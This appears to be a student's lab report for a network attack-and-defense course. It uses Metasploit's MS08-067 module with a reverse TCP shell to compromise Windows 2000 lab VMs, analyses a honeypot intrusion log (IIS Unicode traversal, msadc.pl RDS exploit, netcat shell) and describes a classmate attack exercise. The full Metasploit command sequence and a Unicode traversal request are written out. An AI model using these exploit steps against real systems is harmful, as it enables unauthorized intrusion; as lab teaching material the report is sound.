自学内容网 自学内容网

20232831袁思承2023-2024-2 《网络攻防实践》第6次作业



20232831袁思承 2023-2024-2 《网络攻防实践》第6次作业

1.实验内容

(1)动手实践Metasploit windows attacker
任务:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/Kali攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权

(2)取证分析实践:解码一次成功的NT系统破解攻击
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。并回答以下问题:

1、攻击者使用了什么破解工具进行攻击?
2、攻击者如何使用这个破解工具进入并控制了系统?
3、攻击者获得系统访问权限后做了什么?
4、我们如何防止这样的攻击?
5、你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?

(3)团队对抗实践:windows系统远程渗透攻击和分析
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。

2.实验过程

(1)动手实践Metasploit windows attacker

虚拟机名称IP地址
Kali-Linux攻击机192.168.200.4
Win2kServer_SP0_target靶机192.168.200.124

检查一下攻击机与靶机之间的连通性如下:
在这里插入图片描述

首先,在Kali虚拟机中使用命令进入到Metasploit

msfconsole

在这里插入图片描述

输入以下命令调用MS08-067漏洞以实现相关的攻击,从而利用MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权

use exploit/windows/smb/ms08_067_netapi

在这里插入图片描述

输入以下命令显示可用的攻击负载

show payloads

在这里插入图片描述

选择以下攻击负载以实现反向连接

set payload generic/shell_reverse_tcp

在这里插入图片描述

设置远程渗透攻击的相关信息,即设置攻击目标IP,设置本机IP,再使用show options查看设置的信息:

set RHOST 192.168.200.124
set LHOST 192.168.200.4
show options

在这里插入图片描述

输入以下命令进行攻击

exploit

在这里插入图片描述

攻击成功,进入对方的主机,利用以下命令进行靶机的ip查看

ipconfig

在这里插入图片描述
创建一个文件夹

mkdir ysc

在这里插入图片描述
从wireshark中可以查看这次攻击
在这里插入图片描述
在这里插入图片描述
成功获取目标主机的访问权!

(2)取证分析实践:解码一次成功的NT系统破解攻击

本处实验需要回答以下5个问题:

1、攻击者使用了什么破解工具进行攻击?
2、攻击者如何使用这个破解工具进入并控制了系统?
3、攻击者获得系统访问权限后做了什么?
4、我们如何防止这样的攻击?
5、你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?

首先,下载好snort-0204@0117.log文件后,在Kali中使用wireshark将其打开
在这里插入图片描述
在这里插入图片描述
整体查看文件该日志后,可以发现双方IP地址分别为213.116.251.162172.16.1.106,且存在大量的HTTP、TCP流,以及少量的FTP流。通过简单查看后,不难发现213.116.251.162为攻击者,172.16.1.106为靶机。(当然实验本身也已经说明…)

首先,使用以下命令为筛选条件来依次查看HTTP流

ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106 && http

在这里插入图片描述
跟踪TCP流能发现,攻击者在SESSION:1765-80中成功进行了Unicode攻击以打开NT系统启动文件boot.ini,其request为:GET /guest/default,asp/…%C0%AF./…%C0%AF…1…%C0%AF…/boot.ini HTTP/1.1。因此可以推测存在UNICODE编码漏洞攻击。
在这里插入图片描述
在接下来的TCP中可以发现,攻击者探测了/msadc/msadcs.dll的存在,并在SESSION:1771-80中通过msadcs.d中存在RDS漏洞,即MS02-065 。此后,他进行了SQL注入,获取了权限。根据“ADM!ROX!YOURIWORLD”特征字符串,以及查询语中使用了dbg=c:\winnt\help\iis\htmtutorial\btcustmr.mdb,通过上网查询,可以得知这次攻击是由rain forest puppy 编写的 msadc(2).pl 渗透攻击代码所发起的,攻击者从此获取并成功进入了shell。至此,攻击者通过查点确认了目标系统提供Web服务的是ⅡSv4.0,并存在Unicode 和 MDAC RDS 安全漏洞,可进行进一步渗透攻击。
在这里插入图片描述
攻击者通过蜜网主机下载了所指定的一些文件,并通过 nc构建其一个远程 shell 通道。此后,攻击者连接 6969 端口,获得了访问权,并进入了交互式控制阶段。

攻击者看试查看文件:
在这里插入图片描述
删除了ftpcom文件
在这里插入图片描述
尝试获取密码,以及后续查看本地用户、用户组、管理员账户等等
在这里插入图片描述
删除SAM数据库中的数据(拷贝和删除har.txt),以提升权限。在这里插入图片描述
尝试获取管理员administrator权限
在这里插入图片描述
通过以下内容可知攻击者发现攻击目标为蜜罐主机
在这里插入图片描述

接下来依次回答问题:
1、攻击者使用了什么破解工具进行攻击?
攻击者通过IIS Unicode漏洞,使用了Unicode攻击(针对MS00-078/MS01-026),还利用针对msadcs.dll中RDS漏洞(MS02-065)的msadc.pl/msadc2.pl 渗透攻击工具进行了攻击。
2、攻击者如何使用这个破解工具进入并控制了系统?
攻击者利用Unicode攻击和针对msadcs.dll中RDS漏洞的渗透攻击工具,成功进入了Shell,并获取权限从而控制了系统。通过Unicode攻击了解了被攻击主机操作系统的一些基本情况,发现无法成功获取系统访问权限后,再利用RDS漏洞进行了SQL注入攻击,最终获取了系统访问权限,并给自己创建了一个高权限的用户,达到控制系统的目的。
3、攻击者获得系统访问权限后做了什么?
攻击者获取了系统权限后,仍然尝试获取本地administrator的权限,因此他进行了各种尝试,试图通过删除SAM数据库中的数据(拷贝和删除har.txt)和将自己加到管理员组中的方式来实现提升自己访问权限的目的。
4、我们如何防止这样的攻击?

1、加强口令策略,包括定期更换口令、设置复杂度要求等,以防止口令被猜解或破解。
2、及时安装系统补丁和更新,以修补已知漏洞,减少攻击面。
3、使用入侵检测系统(IDS)和入侵防御系统(IPS)监控和阻止潜在的恶意流量和行为。
4、部署网络防火墙和访问控制列表(ACL)限制外部对系统的访问。
5、定期审计系统日志,及时发现异常行为并采取相应的应对措施。
6、禁用一些平时不用的服务例如RDS。
7、使用IS Lockdown和URLScan等工具加强 web server

5、你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
是的,因为最后攻击者创建了rfp.txt文件并向文件中输入了以下内容,即“我到这才发现了这是蜜罐主机(笑脸)”。因为该目标主机作为rfp的个人网站,Wcb服务所使用的ⅡS甚至没有更新mp自己所发现的 MDAC RDS 安全漏洞,很容易让攻击者意识到这绝对是台诱饵。

C:>echo best honeypot i’ve seen till now : )

在这里插入图片描述

(3)团队对抗实践:windows系统远程渗透攻击和分析

①攻击实践
虚拟机名称IP地址
Kali-Linux攻击机(袁思承)192.168.126.201
Win2kServer_SP0_target靶机 (祝浩宣)192.168.126.141

这部分,为了实现在同一网段下,必须得将二者均采用桥接模式或者将Vmnet0设置为桥接模式(注意,由于均是笔记本连接wifi做实验,必须得将桥接的网卡设置为无线网卡,这里是Intel®Wireless-Ac 9560 160MHz,否则将连接不上外界主机网络,导致实验双方不能在同一网段
在这里插入图片描述
即攻防双方设置Kali-Linux攻击机和Win2kServer_SP0_target靶机均在桥接模式下。
在这里插入图片描述
首先,查看自己的Kali攻击机的IP为:

192.168.126.201

在这里插入图片描述
ping对方的靶机如下:

192.168.126.141

在这里插入图片描述
根据上述(1)中的实验过程,对该IP地址的Win2kServer_SP0_target靶机进行攻击,首先使用以下命令打开Metasploit

msfconsole

在这里插入图片描述
输入以下命令调用MS08-067漏洞以实现相关的攻击,从而利用MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权

use exploit/windows/smb/ms08_067_netapi

输入以下命令显示可用的攻击负载

show payloads

在这里插入图片描述
选择以下攻击负载以实现反向连接

set payload generic/shell_reverse_tcp

在这里插入图片描述

设置远程渗透攻击的相关信息,即设置攻击目标IP,设置本机IP,再使用show options查看设置的信息:

set RHOST 192.168.126.141
set LHOST 192.168.126.201
show options

在这里插入图片描述
输入以下命令进行攻击

exploit

在这里插入图片描述
攻击成功,进入对方的主机,利用以下命令进行对方ip的查看,成功获取

ipconfig

在这里插入图片描述
使用以下命令在对方主机中创建文件夹并进入文件夹

mkdir yuansichengiscoming!
cd yuansichengiscoming!

在这里插入图片描述
查看对方的主机,能够看见已经成功创建该文件夹:
在这里插入图片描述

②防御实践
虚拟机名称IP地址
Kali-Linux攻击机(祝浩宣)192.168.126.125
Win2kServer_SP0_target靶机 (袁思承)192.168.126.79

首先,将靶机设置为Vmnet0网段的桥接模式:
在这里插入图片描述
然而,即使设置为了桥接模式,仍然无法联网,会出现例如IP与同网段中的IP出现冲突,导致ip地址为0.0.0.0的情况,又或者是直接没有网络等等问题。通过寻找方法,需要将靶机的IP地址改为自动获取才可以使得攻防双方拥有同一网段的IP。
在这里插入图片描述
在这里插入图片描述
自动获取IP后,能自动分配到以下ip

192.168.126.79

在这里插入图片描述
首先检查攻防双方是否能够互联,使用ping指令进行检测,发现能够ping通:

ping 192.168.126.125

在这里插入图片描述
被对方攻击后,首先发现自己的主机中多了对方创建的文件夹zhuhaoxuan
在这里插入图片描述
使用wireshark抓包能够发现对方的TCP流以及各类操作:
在这里插入图片描述
跟踪TCP流发现,对方入侵我的主机以后使用了以下命令:
在这里插入图片描述

3.学习中遇到的问题及解决

  • 问题:Win2k直连后无法上网,或者出现IP为0.0.0.0的情况
  • 问题解决方案:将Win2k改为随机获取IP地址,而不是使用指定IP地址

4.学习感悟、思考等

通过本次实验,我学习了如何使用msfconsole工具进行对靶机的漏洞攻击,同时分析了一次成功的NT系统破解攻击,最后与同学进行了攻防实战演练,加深了我对Windows系统远程渗透攻击的理解,并学习了解了防范和应对漏洞攻击的方法。

参考资料


原文地址:https://blog.csdn.net/qq_53198713/article/details/137933602

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!